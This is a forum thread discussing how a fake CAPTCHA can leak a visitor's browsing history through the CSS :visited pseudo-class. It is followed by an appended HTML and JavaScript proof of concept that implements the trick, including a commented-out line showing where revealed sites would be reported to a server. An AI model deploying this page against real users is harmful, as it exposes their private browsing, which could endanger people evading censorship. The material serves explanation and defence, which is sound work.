12 votes

Retrieving your browsing history through a fake CAPTCHA

7 comments

  1. [6]
    balooga

    It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous leak. That's why this proof of concept can detect if you've been to, say, twitter.com, but not a specific user page or tweet.

    OP mentioned that colors are the only properties of visited links that can be styled with CSS. For good reason, otherwise you could brute-force thousands of URLs onto the page and hide the ones that don't match, leaving the victim none the wiser.

    5 votes
    1. petrichor

      OP mentioned that colors are the only properties of visited links that can be styled with CSS.

      So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access the :visited pseudo-class using JavaScript or anything else, IIRC. Any styling of :visited elements only appears to the end user. The reason why the "captcha" attack works is because you're actively clicking (visited) links, which then is an event that can be exfiltrated back to the server.

      brute-force thousands of URLs onto the page

      Also so, there is actually another attack that can bypass the need to click by kinda doing this. If you load an absolutely ridiculous number of URLs (that the user hasn't visited - i.e. something long and random) onto a page, and then change them all to a link you suspect the user has visited, the time the browser takes to redraw the page if the link color changes is actually measurable. This is a known issue and a WONTFIX (for performance reasons).

      3 votes
    2. [4]
      aphoenix

      Consider this scenario though:

      A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and YouTube to get around the Great Firewall. They go to a site, fill out this counterfeit CAPTCHA, and are outed to the government as using banned sites.

      The privacy issues around :visited are often more insidious than they appear.

      2 votes
      1. [3]
        balooga

        Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply having the URL in one's browser history be enough to justify an arrest? Seems like there's room for plausible deniability: if you attempt to load a URL but are unable to reach it (because it's blocked, doesn't exist, you're offline, etc.) it still gets saved in your history, even though you didn't retrieve any content from it. Maybe you unintentionally followed a rogue link or redirect. Maybe someone else had access to your computer. Would even the most totalitarian regime act on something so tenuous? I'm not sure.

        3 votes
        1. MimicSquid

          The answer is probably: "If they wanted a pretext for an action they were going to take anyway." But at that point, the pretext barely matters.

          5 votes
        2. aphoenix

          I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem. Whether they act on it and disappear the person who did it, or whether they simply put the person on a list to watch, it's all bad.

          The real takeaway is that it took me about a half second to think of a way this plausibly infringes on someone's privacy. Someone who is looking to actively infringe on privacy can likely be a lot more effective at it.

          There's also some history to :visited that may be interesting.

          2 votes
  2. aphoenix

    A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are:

    • color
    • background-color
    • border-color, border-bottom-color, border-left-color, border-right-color, border-top-color
    • column-rule-color
    • outline-color
    • text-decoration-color
    • text-emphasis-color

    Notably, these are all colour-related; you cannot extend this to images, due to the privacy restrictions on this pseudo element.

    So don't do captchas that rely entirely on colour!

    4 votes
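The fake-CAPTCHA mechanism the thread describes (paint unvisited links in the background colour so only visited ones stand out, ask the user to click the ones they can see, and record the click) as one self-contained page. This is an added example, not the proof of concept the thread is discussing and not code from any of the commenters; the candidate URLs, the element ids and the commented-out report endpoint are assumptions. It also makes the two points above visible: a script cannot read the visited state back through getComputedStyle, and a :visited rule only affects the colour properties in aphoenix's list.

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>:visited demo (added example, not the original PoC)</title>
<style>
  /* Unvisited links share the page background colour, so they are
     invisible; a visited link is painted red and stands out. */
  body { background: #ffffff; font-family: sans-serif; }
  #grid a { display: inline-block; padding: 8px 14px; margin: 4px; border: 1px solid #dddddd; }
  #grid a:link    { color: #ffffff; text-decoration: none; }
  #grid a:visited { color: #c00000; }
  /* Only the colour properties are honoured for :visited. This rule is
     ignored by the browser and is here only to show the restriction. */
  #grid a:visited { font-weight: bold; background-image: url(dot.png); }
</style>
</head>
<body>
<p>"Click every square that contains red text"</p>
<div id="grid"></div>
<pre id="log"></pre>
<script>
// Assumed candidate list. The match against history is exact, so each
// entry is a site root, the form most visits leave behind. The last entry
// is a control that should never be painted.
const candidates = [
  "https://twitter.com/",
  "https://www.facebook.com/",
  "https://www.bbc.com/",
  "https://www.youtube.com/",
  "https://example.invalid/never-visited/",
];

const grid = document.getElementById("grid");
const log = document.getElementById("log");

for (const url of candidates) {
  const a = document.createElement("a");
  a.href = url;
  a.textContent = "click";
  a.addEventListener("click", (ev) => {
    // Stay on the page: navigating would put the candidate into history
    // and turn the control red on the next load. The click is the signal.
    ev.preventDefault();
    // A real attacker would send this to their own server, for example
    // fetch("/report", { method: "POST", body: url });  (hypothetical endpoint)
    log.textContent += "user indicates visited: " + url + "\n";
  });
  grid.appendChild(a);

  // Scripts cannot read the visited state: the computed colour reported
  // here is the :link colour for every anchor, visited or not.
  console.log(url, getComputedStyle(a).color);
}
</script>
</body>
</html>
```

Open the file in a browser that has one of the candidate sites in its history and the matching square shows red text while the control stays blank; the console shows the same colour for every anchor regardless. Because the match is exact, `https://twitter.com/` is only detected if that precise URL is in history, which is the limitation balooga points out, and it is why real attempts pad the list with many URL variants rather than one per site.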